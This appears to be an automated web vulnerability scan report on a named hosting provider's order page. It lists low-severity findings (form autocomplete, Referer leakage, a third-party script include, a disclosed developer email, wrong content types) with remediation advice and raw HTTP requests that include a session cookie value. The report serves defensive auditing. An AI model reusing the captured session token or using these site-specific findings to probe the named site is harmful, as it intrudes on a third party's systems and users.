Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The response contains the following link to another domain:
https://verify.authorize.net/anetseal/seal.js
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /order.php?action=orderpersonalaspclass HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: http://www.arvixe.com/sitefinity_hosting User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
The response dynamically includes the following script from another domain:
https://verify.authorize.net/anetseal/seal.js
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET /order.php?action=orderpersonalaspclass HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: http://www.arvixe.com/sitefinity_hosting User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
The following email address was disclosed in the response:
klaus.hartl@stilbuero.de
Request
GET /css/styleset.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 200 OK Date: Wed, 16 Mar 2011 18:00:00 GMT Server: Apache Last-Modified: Wed, 15 Dec 2010 05:21:58 GMT Accept-Ranges: bytes Content-Length: 11454 Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/css
...*{padding: 0; margin: 0;}
/* Caching CSS created with the help of; Klaus Hartl <klaus.hartl@stilbuero.de> */ @media projection, screen { div.imgCache { position: absolute; left: -8000px; top ...[SNIP]...
6. Content type incorrectly statedprevious There are 2 instances of this issue:
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.